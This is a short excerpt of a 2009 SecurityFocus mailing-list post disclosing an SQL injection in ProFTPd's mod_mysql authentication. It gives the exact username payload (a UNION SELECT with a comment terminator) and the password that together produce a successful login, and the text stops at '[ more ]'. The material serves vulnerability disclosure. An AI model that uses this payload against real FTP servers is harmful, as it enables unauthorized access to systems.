Back to list
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)
Feb 10 2009 07:49PM
gat3way gat3way eu
Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like:
USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
and a password of "1" (without quotes).
which leads to a successful login. Differ...
[ more ]
Copyright 2010, SecurityFocus